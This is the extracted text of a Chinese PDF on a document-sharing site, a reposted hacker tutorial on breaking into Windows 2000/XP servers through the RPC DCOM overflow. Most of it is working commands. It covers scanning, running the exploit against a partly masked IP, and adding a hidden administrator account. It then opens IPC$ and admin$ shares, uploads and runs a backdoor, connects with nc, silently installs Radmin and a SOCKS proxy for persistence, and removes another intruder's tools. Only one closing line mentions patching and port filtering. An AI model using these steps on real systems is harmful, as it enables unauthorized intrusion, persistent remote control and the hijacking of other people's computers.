2022年入侵服务器 2.pdf

上传人:C****o 文档编号:40144840 上传时间:2022-09-08 格式:PDF 页数:6 大小:42.49KB
返回 下载 相关 举报
2022年入侵服务器 2.pdf_第1页
第1页 / 共6页
2022年入侵服务器 2.pdf_第2页
第2页 / 共6页
点击查看更多>>
资源描述

《2022年入侵服务器 2.pdf》由会员分享,可在线阅读,更多相关《2022年入侵服务器 2.pdf(6页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。

1、一步步教你学dcomrpc 入侵2010-01-25 14:57:46 来源:互联网最近,网上非常流行dcomrpc,那今天我们就教你详细的利用dcomrpc 入侵。和入侵之后必须做什么。需要的工具:很好的:radmin.E E 扫描工具:retinarpcdcom.E E 溢出攻击工具:RpcDco.最近,网上非常流行dcomrpc,那今天我们就教你详细的利用dcomrpc 入侵。和入侵之后必须做什么。需要的工具:很好的:radmin.EE 扫描工具:retinarpcdcom.E E 溢出攻击工具:RpcDcom(通用溢出工具)脚本开启telnet 工具:telnet.vbe opente

2、lnet.EE resumetelnet.EE 代理:sksockserver.EE 后门程序:WinEggDropShellPro3thVersion 好了,该做的都做的差不多了。先使用 retinarpcdcom.E E 扫描一个网段。查找有rpc 漏洞的机子,这个漏洞需要135端口开放,(想必随便扫一下就会发现有许多主机开放的135 端口)211.217.50.xx 第一个主机就被扫出来又此漏洞。看看 211.217.50.xx 有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下其他的缺陷主机开了3389 端口我们可以上去看一下是xp 版本还是 win2k 是 win2k ser

3、ver 版本展开命令行:查看 dcomrpc 的用法用法dcomrpc-d options F:/hackcd rpc/dcomrpc RPC DCOM Expl01t coded by.:oc192.us:.Security Complied and Modified by Expl01t Usage:dcomrpc-d options 名师资料总结-精品资料欢迎下载-名师精心整理-第 1 页,共 6 页 -Options:-d:Hostname to attack Required-t:Type Default:0-r:Return address Default:Selected fro

4、m target-p:Attack port Default:135-l:Bindshell port Default:666 Types:0 0 x0018759f:Win2k-Universal 1 0 x0100139d:WinXP-Universal 开始进行溢出:F:/hackcd rpc/dcomrpc-d 211.217.50.xx 0 RPC DCOM remote expl01t-.:oc192.us:.Security Complied and recorrected by Expl01t +Resolving host.+Done.+Expl01ting.Just wai

5、t.等到出现,说明溢出成功c:/winnt/system32 接着我们建立用户c:/winnt/system32net user blueye$1111/add 命令成功完成。把用户添加成超级管理员名师资料总结-精品资料欢迎下载-名师精心整理-第 2 页,共 6 页 -c:/winnt/system32net localgroup administrators blueye$/add 命令成功完成。看看共享开了没有没有的话把共享开开c:/winnt/system32net share 清单是空的。c:/winnt/system32net share ipc$命令成功完成。c:/winnt/sy

6、stem32net share admin$命令成功完成。到这里我们入侵告一段落 建 立 IPC$连 接,也可以使用tftp 上传,先和对方建立连接 F:/hacknet use/211.217.50.xx/ipc$1111/user:blueye$上 传 一 个 后 门 程 序 到 对 方 的 主 机 里 F:/hackcopy d:/inject.E E/211.217.50.xx/admin$/system32 F:/hackcopy d:/tback.dll/211.217.50.xx/admin$/system32 然后运行后门程序,我们可以使用at 命令。但是有的机器把at 明令禁

7、止了,建议直接开起 telnet 使用 opentelnet.EE 关闭开启的telnet 使用 resumetelnet/ip user password 如果忘记开共享可以使用脚本开启telnet 来开共享,用法:cscript telnet.vbe ip user password null port(null是验证方式)F:/hackopentenet/211.217.50.xx blueye$1111 1 4567 F:/hacktelnet 211.217.50.xx 4567 名师资料总结-精品资料欢迎下载-名师精心整理-第 3 页,共 6 页 -(省略)连接并运行后门程序运行后

8、门程序命令根目录:inject.EE-run(后门使用方法和安装都在zip 文件里面包含了)后门端口 123456 F:/hacknc 211.217.50.xx 123456 Welcome To WinEggDropShell Matrix Version Melody 下面安装 radmin,配置好的radmin 客户端有4 个文件。配置radmin 客户端可参考相关文章。radmin.reg raddrv.dll admdll.dll r_server.EE 把这个 4 个文件 copy c:/winnt/system32 在目录下面执行命令c:/winnt/system32r_ser

9、ver/s radmin.reg-导入注册表c:/winnt/system32r_server/install/silence-安装 radmin.并且不显示托盘c:/winnt/system32net start r_server-启动服务安装 sock 代理把 sksockserver.EE copy c:/winnt/system32 c:/winnt/system32sksockserver/install-安装服务c:/winnt/system32sksockserver-config port 1234-端口定在1234 自己可以改名师资料总结-精品资料欢迎下载-名师精心整理-第

10、4 页,共 6 页 -c:/winnt/system32sksockserver-config starttype 2-开机自动启动c:/winnt/system32net start skserver-启动服务最后删除共享net share ipc$/del net share admin$/del 在安装 radmin 的时候你发现有人已经安装了。看操作(我输入的内容)后门连接F:/hacknc 211.217.50.xx 123456 Welcome To WinEggDropShell Matrix Version Melody#(pslist)Melody#(pskill r_ser

11、ver)Melody#(shell)c:/winnt/system32(del r_server.E E)c:/winnt/system32(del admdll.dll)c:/winnt/system32(del raddrv.dll)copy 你自己的上去,然后安装省事的办法直接导入注册表,然后重新输入安装命令运行,就可以了,只是在原来默认端口上面架上了密码。这时,你就会有疑问了!为什么我输入导入注册表命令不管用呢?出现什么regedit 不是可运行的程序之类的。出现这样的情况最简单的解决办法telnet 上去导入试试看,还可以先运行radmin 然后在 radmin 的 dos下导入,也是可以的。防御办法:名师资料总结-精品资料欢迎下载-名师精心整理-第 5 页,共 6 页 -安装 rpc 补丁,使用防火墙过滤135,445,139 等端口。本 篇 文 章 来 源 于黑 客 基 地-全 球 最 大 的 中 文 黑 客 站原 文 链 接:http:/ 名师资料总结-精品资料欢迎下载-名师精心整理-第 6 页,共 6 页 -

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 教育专区 > 高考资料

本站为文档C TO C交易模式,本站只提供存储空间、用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。本站仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知淘文阁网,我们立即给予删除!客服QQ:136780468 微信:18945177775 电话:18904686070

工信部备案号:黑ICP备15003705号© 2020-2023 www.taowenge.com 淘文阁